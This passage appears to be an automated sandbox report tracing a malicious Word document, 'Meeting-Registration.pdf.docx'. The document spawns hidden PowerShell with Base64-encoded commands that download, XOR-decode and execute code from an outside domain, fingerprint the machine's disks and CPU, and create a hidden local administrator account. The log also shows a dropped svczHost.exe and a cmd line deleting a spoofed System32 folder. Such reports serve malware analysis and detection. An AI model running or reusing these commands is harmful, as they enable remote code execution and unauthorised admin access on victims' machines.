                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:04:41:01
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""
                                                                                  Imagebase:0x7ff73cf30000
                                                                                  File size:1'635'104 bytes
                                                                                  MD5 hash:E7F3B8EA1B06F46176FC5C35307727D6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:04:41:01
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:04:41:01
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:04:41:01
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:04:41:01
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:04:41:04
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sppsvc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\sppsvc.exe
                                                                                  Imagebase:0x7ff6fdc00000
                                                                                  File size:4'629'328 bytes
                                                                                  MD5 hash:30C7EF47B57367CC546173BB4BB2BB04
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:04:41:07
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff69c900000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:04:41:33
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\Temp\svczHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
                                                                                  Imagebase:0x7ff70a200000
                                                                                  File size:8'351'232 bytes
                                                                                  MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 16%, ReversingLabs
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:21
                                                                                  Start time:04:41:33
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:04:41:33
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:23
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c sc query myRdpService
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:25
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:26
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:27
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sc query myRdpService
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:28
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:29
                                                                                  Start time:04:41:34
                                                                                  Start date:08/11/2024
